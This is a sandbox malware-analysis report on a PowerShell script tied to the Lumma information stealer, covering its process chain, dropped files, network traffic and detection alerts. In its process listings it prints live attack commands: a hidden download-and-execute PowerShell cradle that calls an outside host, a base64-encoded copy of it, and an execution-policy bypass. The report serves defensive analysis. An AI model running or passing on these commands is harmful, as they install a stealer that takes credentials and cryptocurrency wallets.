File name:

ofsetvideofre.click.ps1

Full analysis: https://app.any.run/tasks/3e5dcc37-b67e-40b0-8bb2-87383cb5bce0
Verdict: Malicious activity
Threats:

Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.

Analysis date: September 07, 2024, 21:45:31
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
lumma
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

A63AD45894B36993E894E20279BE145A

SHA1:

40B85944355791391A5F4E46BFE596893D0C8F78

SHA256:

A8874E8A45555E5B3CBF40CE49BD4E79731CC740D4D0F4D9C55CFC0D770679C1

SSDEEP:

6:s8qkKYHazxkQ7C23kobe+sX54ks7TQKoak0DeCj6eMiNQR4sbk:s8q/YHSxpC01CTIfQmzuRA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7004)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4784)
      • powershell.exe (PID: 2584)
    • Connects to the CnC server

      • svchost.exe (PID: 2256)
    • LUMMA has been detected (SURICATA)

      • SearchIndexer.exe (PID: 6160)
      • svchost.exe (PID: 2256)
    • Stealers network behavior

      • SearchIndexer.exe (PID: 6160)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7004)
      • powershell.exe (PID: 4784)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 7004)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 7004)
    • Application launched itself

      • powershell.exe (PID: 7004)
      • powershell.exe (PID: 4784)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 4784)
    • Request a resource from the Internet using PowerShell's cmdlet

      • powershell.exe (PID: 4784)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Checks for external IP

      • svchost.exe (PID: 2256)
      • powershell.exe (PID: 2584)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2256)
      • powershell.exe (PID: 2584)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 2584)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2584)
      • Set-up.exe (PID: 4392)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 2584)
    • Starts application with an unusual extension

      • Set-up.exe (PID: 4392)
    • Contacting a server suspected of hosting an CnC

      • SearchIndexer.exe (PID: 6160)
      • svchost.exe (PID: 2256)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 2584)
    • Checks proxy server information

      • powershell.exe (PID: 2584)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Create files in a temporary directory

      • more.com (PID: 3672)
      • Set-up.exe (PID: 4392)
    • Reads the computer name

      • Set-up.exe (PID: 4392)
      • StrCmp.exe (PID: 2268)
      • more.com (PID: 3672)
    • The process uses the downloaded file

      • powershell.exe (PID: 2584)
    • The executable file from the user directory is run by the Powershell process

      • Set-up.exe (PID: 4392)
    • Checks supported languages

      • Set-up.exe (PID: 4392)
      • StrCmp.exe (PID: 2268)
      • more.com (PID: 3672)
    • Creates files or folders in the user directory

      • Set-up.exe (PID: 4392)
    • Reads the software policy settings

      • SearchIndexer.exe (PID: 6160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
10
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe #LUMMA svchost.exe set-up.exe strcmp.exe no specs more.com no specs conhost.exe no specs #LUMMA searchindexer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2256C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2268C:\Users\admin\AppData\Roaming\CHM\JHPCDDOJEKVIFLPVMWR\StrCmp.exeC:\Users\admin\AppData\Roaming\CHM\JHPCDDOJEKVIFLPVMWR\StrCmp.exeSet-up.exe
User:
admin
Company:
aaa
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\users\admin\appdata\roaming\chm\jhpcddojekviflpvmwr\strcmp.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvbvm60.dll
2584"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -c "iex (iwr https://iplogger.co/2h4Cg5 -UseBasicParsing).Content"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2700\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3672C:\WINDOWS\SysWOW64\more.comC:\Windows\SysWOW64\more.comSet-up.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
More Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll
4392"C:\Users\admin\AppData\Local\Temp\file\Set-up.exe" C:\Users\admin\AppData\Local\Temp\file\Set-up.exe
powershell.exe
User:
admin
Company:
iTop Inc.
Integrity Level:
MEDIUM
Description:
iTop Screen Recorder
Exit code:
1
Version:
3.0.0.945
Modules
Images
c:\users\admin\appdata\local\temp\file\set-up.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
4784"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AaQBwAGwAbwBnAGcAZQByAC4AYwBvAC8AMgBoADQAQwBnADUAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6160C:\WINDOWS\SysWOW64\SearchIndexer.exeC:\Windows\SysWOW64\SearchIndexer.exe
more.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Windows Search Indexer
Exit code:
0
Version:
7.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\orioarjh
c:\windows\syswow64\searchindexer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
6168\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exemore.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7004"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\ofsetvideofre.click.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
15 634
Read events
15 620
Write events
14
Delete events
0

Modification events

(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
52
Suspicious files
38
Text files
396
Unknown types
0

Dropped files

PID
Process
Filename
Type
7004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:E16BBB42015D4055DC1A56E05470DA46
SHA256:FF638C9F44B13E759BB94D79914068317A60BDE04DD1AF05AC6A01B5195214BD
7004powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bmxkxri1.k4n.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\file\ffjqbinary
MD5:55FDC73A2152B6BC79BF4939121EBA2D
SHA256:2C230D7E8F82A45DED81AF02648744876B6F979854794C0E854F328F09913E30
4784powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ry0d5ifp.nzf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\pgrt1.zipcompressed
MD5:DDCFCD9B586F9CBDF6FA160C48C52B30
SHA256:8EF69B1FB9FB7A565EA2A1B8873BC5B4851F644F978FC54E1CC49D05FF4250DA
7004powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dstyyli0.tih.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_10bnqqst.j3m.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jzxnw0n0.uq2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\file\Resource\AuditSettings.admxxml
MD5:9A36A7410B4EF98B36DA553E050B9788
SHA256:EBAC316580540B7EE8E399F890470527E456F2C6A103FCC899F4B2442D8E69F7
4784powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f23vh3aa.l1s.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
40
DNS requests
17
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2120
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1780
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6768
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6768
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
7008
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2120
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
3260
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1780
svchost.exe
20.190.159.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1780
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
7008
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
google.com
  • 172.217.16.206
whitelisted
client.wns.windows.com
  • 40.113.110.67
  • 40.113.103.199
whitelisted
login.live.com
  • 20.190.159.71
  • 20.190.159.0
  • 40.126.31.73
  • 20.190.159.75
  • 20.190.159.23
  • 20.190.159.2
  • 20.190.159.4
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
iplogger.co
  • 172.67.167.249
  • 104.21.82.93
shared
tengkis-txt.b-cdn.net
  • 169.150.247.40
whitelisted
tengkis.b-cdn.net
  • 138.199.37.232
whitelisted
slscr.update.microsoft.com
  • 52.165.165.26
whitelisted

Threats

PID
Process
Class
Message
2256
svchost.exe
Domain Observed Used for C2 Detected
ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassicnuadnwi .shop)
6160
SearchIndexer.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
2 ETPRO signatures available at the full report
No debug info